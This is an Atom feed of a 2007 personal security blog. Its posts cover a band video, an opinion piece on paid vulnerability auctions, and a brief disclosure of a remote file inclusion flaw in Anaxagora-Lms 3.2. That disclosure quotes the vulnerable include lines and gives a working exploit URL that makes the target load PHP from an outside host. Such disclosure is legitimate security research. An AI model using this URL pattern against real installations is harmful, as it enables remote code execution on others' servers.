<?xml version='1.0' encoding='UTF-8'?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/'><id>tag:blogger.com,1999:blog-3254700909821760089</id><updated>2007-07-28T19:01:30.800-04:00</updated><title type='text'>Lots of 1's and 0's</title><link rel='alternate' type='text/html' href='http://www.ericintzandt.com/blog.php'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default'/><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.ericintzandt.com/atom.xml'/><author><name>navairum</name></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>4</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3254700909821760089.post-5461979182330735551</id><published>2007-07-23T14:45:00.000-04:00</published><updated>2007-07-28T19:01:30.829-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='the joys'/><title type='text'>This is why Sundays are the best day of the week!
...</title><content type='html'>This is why Sundays are the best day of the week!&lt;br /&gt;&lt;br /&gt;Check out &lt;a href="http://www.thejoys.ca"&gt;The Joys&lt;/a&gt; and be sure to pick up their cd &lt;a href="http://www.thejoys.ca/new%20merch.php"&gt;Demolition Session&lt;/a&gt; or pre-order their new one.  Here's a dose of a Sunday night ritual.&lt;br /&gt;&lt;br /&gt;&lt;a href="joys/july_22_2007.mpg"&gt;Download link here&lt;/a&gt;</content><link rel='alternate' type='text/html' href='http://www.ericintzandt.com/2007/07/joys-video-from-sunday-night.html' title=''/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3254700909821760089&amp;postID=5461979182330735551' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.ericintzandt.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default/5461979182330735551'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default/5461979182330735551'/><author><name>navairum</name></author></entry><entry><id>tag:blogger.com,1999:blog-3254700909821760089.post-5348559392224040567</id><published>2007-07-13T14:22:00.001-04:00</published><updated>2007-07-13T15:52:20.337-04:00</updated><title type='text'>All the WabiSabiLabi hype</title><content type='html'>I was reading through an article on &lt;a href="http://www.securityfocus.com/news/11474"&gt;Securityfocus&lt;/a&gt; about the new vulnerability auction site &lt;a href="http://www.wslabi.com/wabisabilabi/home.do?"&gt;WabiSabiLabi&lt;/a&gt;.   Basically theres a lot of commotion because people are scared that organized crime (and other bad people) will be able to buy these vulnerabilities and use them in targeted attacks.  Now I can see that happening, but it causes me to stop and think.&lt;br /&gt;&lt;br /&gt;Any true 'organized crime' group probably doesn't need to buy these vulnerabilities because they have their own hackers, and they more-than-likely have their own vuln's.  Maybe it would save them time to just spend $2000 and get a PoC, but I don't think they would need it.&lt;br /&gt;&lt;br /&gt;Maybe I'm a little biased about this article, but every blog I read about it is saying how finally researchers have a chance to earn something from their work.  Damn right! Why should you spend x amount of hours researching a vulnerability, then notify the vendor (who probably wont take action soon, if ever) and get nothing out of it?  I like the idea of actually getting paid for your research, especially since not everybody has a high paying job.&lt;br /&gt;&lt;br /&gt;My favorite quote from the article:&lt;br /&gt;&lt;blockquote&gt;&lt;span class="body"&gt; "We do not believe that offering compensation for vulnerability information is the best way we can help protect our customers," the software giant said in a statement sent to SecurityFocus. "Our policy is to credit finders who report vulnerabilities to us in a responsible manner."&lt;/span&gt;&lt;/blockquote&gt;Also, I'm a Microsoft customer, I feel that if they paid for vulnerabilities they would have a lot more submissions, which would in turn make a more secure operating system (aka protecting their customers)&lt;br /&gt;I know I would much rather get 'credit' from Microsoft as opposed to money for rent....</content><link rel='alternate' type='text/html' href='http://www.ericintzandt.com/2007/07/all-wabisabilabi-hype.html' title='All the WabiSabiLabi hype'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3254700909821760089&amp;postID=5348559392224040567' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.ericintzandt.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default/5348559392224040567'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default/5348559392224040567'/><author><name>navairum</name></author></entry><entry><id>tag:blogger.com,1999:blog-3254700909821760089.post-730100301351286920</id><published>2007-07-12T13:24:00.000-04:00</published><updated>2007-07-13T15:47:08.789-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RFI vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='bug'/><title type='text'>Anaxagora RFI vuln</title><content type='html'>Simple remote file inclusion vulnerability.&lt;br /&gt;&lt;br /&gt;Product:  Anaxagora-Lms&lt;br /&gt;Version: 3.2&lt;br /&gt;File: Common.inc.php&lt;br /&gt;&lt;br /&gt;class_path variable not initialized prior to including:&lt;br /&gt;&lt;br /&gt;include_once($class_path."bdd.class.php");&lt;br /&gt;include_once($class_path."connexion.class.php");&lt;br /&gt;include_once($class_path."membre.class.php");&lt;br /&gt;&lt;br /&gt;vulnerable url:&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;LCMS/anaxagora/inc/Common.inc.php?class_path=http://tech.torc.k12.nm.us/techtools/phpinfo.txt?&lt;/span&gt;</content><link rel='alternate' type='text/html' href='http://www.ericintzandt.com/2007/07/anaxagora-rfi-vuln.html' title='Anaxagora RFI vuln'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3254700909821760089&amp;postID=730100301351286920' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.ericintzandt.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default/730100301351286920'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default/730100301351286920'/><author><name>navairum</name></author></entry><entry><id>tag:blogger.com,1999:blog-3254700909821760089.post-7393627043324747222</id><published>2007-07-11T10:16:00.000-04:00</published><updated>2007-07-11T10:17:07.923-04:00</updated><title type='text'>First post</title><content type='html'>test!</content><link rel='alternate' type='text/html' href='http://www.ericintzandt.com/2007/07/first-post.html' title='First post'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3254700909821760089&amp;postID=7393627043324747222' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.ericintzandt.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default/7393627043324747222'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3254700909821760089/posts/default/7393627043324747222'/><author><name>navairum</name></author></entry></feed>